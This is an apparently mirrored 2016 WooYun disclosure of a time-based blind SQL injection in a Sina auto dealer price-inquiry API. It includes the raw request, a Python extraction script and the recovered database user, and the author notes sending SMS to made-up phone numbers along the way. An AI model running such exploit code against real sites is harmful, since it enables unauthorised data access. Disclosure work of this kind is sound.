乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-24: 细节已通知厂商并且等待厂商处理中 2016-03-25: 厂商已经确认,细节仅向厂商公开 2016-04-04: 细节向核心白帽子及相关领域专家公开 2016-04-14: 细节向普通白帽子公开 2016-04-24: 细节向实习白帽子公开 2016-05-09: 细节向公众公开
昨天刷微博不小心挖的漏洞38万数据不给我20rank生气!!!再给我10rank我明天还挖一个你信不信
POST /new/index.php/api/xunjia/AjaxAskPrice HTTP/1.1Host: weidealer.auto.sina.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 192info%5Bmobile%5D=13888888889&info%5Bprovince_id%5D=11&info%5Bcity_id%5D=1&info%5Bbrand_id%5D=95&info%5Bsub_brand_id%5D=1661&info%5Bcar_id%5D=18058&info%5Bxname%5D=false&info%5Bask_reffer%5D=67
注入点car[id]时间盲注然后用自己的手机号跑啊跑啊 发现单个手机号码最多发20次短信手机号那里有个验证但是user的长度大于20,需要更换手机号,所以对不起我随便编出来的手机号的各位了附验证脚本:
#!/usr/bin/env python# coding: UTF-8 (๑•̀ㅂ•́)و✧__author__ = 'T1m0n'import httplib, timeheaders = { 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 'User-Agent': 'Mozilla/5.0(WindowsNT6.3;Win64;x64;rv:44.0) Gecko / 20100101Firefox / 44.0', 'Host': 'weidealer.auto.sina.com.cn', 'Content-Type': 'application/x-www-form-urlencoded',}user = ''payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_'i = 100for x in range(1, 24): for payload in payloads: conn = httplib.HTTPConnection('weidealer.auto.sina.com.cn', 80) url = '/new/index.php/api/xunjia/AjaxAskPrice' start_time = time.time() number = '138345%05d' % i body = 'info[mobile]=' + number + '&info[province_id]=11&info[city_id]=1&info[brand_id]=95&info[sub_brand_id]=1661&info[car_id]=18058 AND (SELECT * FROM (SELECT' body += '(if(ascii(substr(user(),%d,1))=%d,sleep(5),1)' % (x, ord(payload)) body += '))zkHd)-- mGEC&info[xname]=false&info[ask_reffer]=67' conn.request('POST', url, body, headers) res = conn.getresponse().read() conn.close() print '.', i += 1 if time.time() - start_time > 5: print payload user += payload breakprint user
跑完是这样子的
user:[email protected]
过滤
危害等级:中
漏洞Rank:6
确认时间:2016-03-25 18:25
感谢关注新浪安全,问题修复中。
暂无